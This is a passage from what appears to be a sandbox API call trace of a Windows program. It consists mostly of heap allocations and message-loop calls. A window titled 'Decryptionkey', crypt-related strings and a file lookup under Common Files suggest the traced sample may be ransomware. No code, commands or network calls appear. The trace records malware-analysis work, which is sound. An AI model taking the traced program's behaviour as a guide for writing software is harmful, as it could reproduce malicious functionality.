0xd [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xeec818 [0255.539] GetWindowTextW (in: hWnd=0x400a2, lpString=0xeec818, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec868 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c50 [0255.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec818 | out: hHeap=0xc60000) returned 1 [0255.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b120 | out: hHeap=0xc60000) returned 1 [0255.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0255.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4c70 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b120 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c40 [0255.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c40 | out: hHeap=0xc60000) returned 1 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b300 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b88 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c40 [0255.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b88 | out: hHeap=0xc60000) returned 1 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec818 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b88 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78bb8 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec890 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2d0 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c30 [0255.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2d0 | out: hHeap=0xc60000) returned 1 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2d0 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b000 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec8b8 [0255.540] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ac8 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c20 [0255.541] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ac8 | out: hHeap=0xc60000) returned 1 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec8e0 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ac8 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec908 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af10 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c10 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b210 [0255.541] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81c88 [0255.541] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 1 [0255.541] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f83c) returned 0 [0255.541] TranslateMessage (lpMsg=0x87f83c) returned 0 [0255.541] DispatchMessageW (lpMsg=0x87f83c) returned 0x0 [0255.541] GetForegroundWindow () returned 0x50150 [0255.541] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.541] GetCursorPos (in: lpPoint=0x87f678 | out: lpPoint=0x87f678*(x=883, y=499)) returned 1 [0255.541] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f678 | out: lpPoint=0x87f678) returned 1 [0255.541] GetAsyncKeyState (vKey=1) returned 0 [0255.541] GetAsyncKeyState (vKey=2) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 1 [0255.542] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f83c) returned 0 [0255.542] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f83c) returned 1 [0255.542] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec930 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b030 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c00 [0255.542] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b030 | out: hHeap=0xc60000) returned 1 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec958 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b030 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b318 [0255.542] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4bf0 [0255.542] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b318 | out: hHeap=0xc60000) returned 1 [0255.542] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bf0 | out: hHeap=0xc60000) returned 1 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec980 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b318 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4bf0 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b048 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4be0 [0255.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0255.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4be0 | out: hHeap=0xc60000) returned 1 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec9a8 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4be0 [0255.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec9d0 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78cd8 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4bd0 [0255.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78cd8 | out: hHeap=0xc60000) returned 1 [0255.543] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bd0 | out: hHeap=0xc60000) returned 1 [0255.543] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec9f8 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78cd8 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4bd0 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b1f8 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b138 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4bc0 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b138 | out: hHeap=0xc60000) returned 1 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bc0 | out: hHeap=0xc60000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeeca20 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b138 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4bc0 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b138 | out: hHeap=0xc60000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeeca48 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b138 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b078 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4bb0 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b078 | out: hHeap=0xc60000) returned 1 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bb0 | out: hHeap=0xc60000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeeca70 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b078 [0255.544] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4bb0 [0255.544] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b078 | out: hHeap=0xc60000) returned 1 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeeca98 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b078 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b28 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4ba0 [0255.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b28 | out: hHeap=0xc60000) returned 1 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecac0 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b28 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b90 [0255.545] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0255.545] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b90 | out: hHeap=0xc60000) returned 1 [0255.545] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x87f288 | out: lpFindFileData=0x87f288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x87f2fc, dwReserved1=0xc675d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xed5838 [0255.545] FindClose (in: hFindFile=0xed5838 | out: hFindFile=0xed5838) returned 1 [0255.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0255.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b28 | out: hHeap=0xc60000) returned 1 [0255.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecac0 | out: hHeap=0xc60000) returned 1 [0255.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ba0 | out: hHeap=0xc60000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecac0 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b28 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ba0 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c48 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b90 [0255.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c48 | out: hHeap=0xc60000) returned 1 [0255.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b90 | out: hHeap=0xc60000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecae8 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c48 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b90 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af88 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a38 [0255.547] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b80 [0255.547] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78a38 | out: hHeap=0xc60000) returned 1 [0255.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b80 | out: hHeap=0xc60000) returned 1 [0255.548] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b80 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb10 [0255.548] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0255.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb10 | out: hHeap=0xc60000) returned 1 [0255.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b80 | out: hHeap=0xc60000) returned 1 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78a38 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81cd0 [0255.548] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b80 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b70 [0255.548] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.548] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7af40 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81d18 [0255.549] PeekMessageW (in: lpMsg=0x87f1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1c4) returned 0 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b70 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b60 [0255.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b60 | out: hHeap=0xc60000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af58 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78a08 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789a8 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b60 [0255.549] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aeb0 [0255.549] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aec8 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aeb0 | out: hHeap=0xc60000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aeb0 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aec8 | out: hHeap=0xc60000) returned 1 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81d18 | out: hHeap=0xc60000) returned 1 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af40 | out: hHeap=0xc60000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b70 [0255.550] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.550] GetLastError () returned 0x0 [0255.550] SetLastError (dwErrCode=0x0) [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aeb0 | out: hHeap=0xc60000) returned 1 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.550] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b80 | out: hHeap=0xc60000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed5838 [0255.550] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 1 [0255.550] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f5e4) returned 0 [0255.551] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f5e4) returned 1 [0255.551] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb10 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aeb0 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b80 [0255.551] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aeb0 | out: hHeap=0xc60000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb38 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aeb0 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af40 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b70 [0255.551] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af40 | out: hHeap=0xc60000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb60 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af40 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b50 [0255.551] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aec8 [0255.551] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b50 | out: hHeap=0xc60000) returned 1 [0255.552] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0255.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb88 [0255.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b50 [0255.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aec8 | out: hHeap=0xc60000) returned 1 [0255.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af40 | out: hHeap=0xc60000) returned 1 [0255.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb60 | out: hHeap=0xc60000) returned 1 [0255.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.556] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b70 [0255.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b40 [0255.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b40 | out: hHeap=0xc60000) returned 1 [0255.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.556] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b70 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0255.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb60 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4b70 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecbb0 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af40 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b40 [0255.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b40 | out: hHeap=0xc60000) returned 1 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7aec8 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecbd8 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78978 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b40 [0255.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78978 | out: hHeap=0xc60000) returned 1 [0255.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc00 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78978 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81d18 [0255.558] PeekMessageW (in: lpMsg=0x87f38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f38c) returned 0 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae80 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae98 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78948 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b30 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.558] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78948 | out: hHeap=0xc60000) returned 1 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.558] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae98 | out: hHeap=0xc60000) returned 1 [0255.559] PeekMessageW (in: lpMsg=0x87f38c, hWnd=0x0, wMsgFilterMin=0x0, 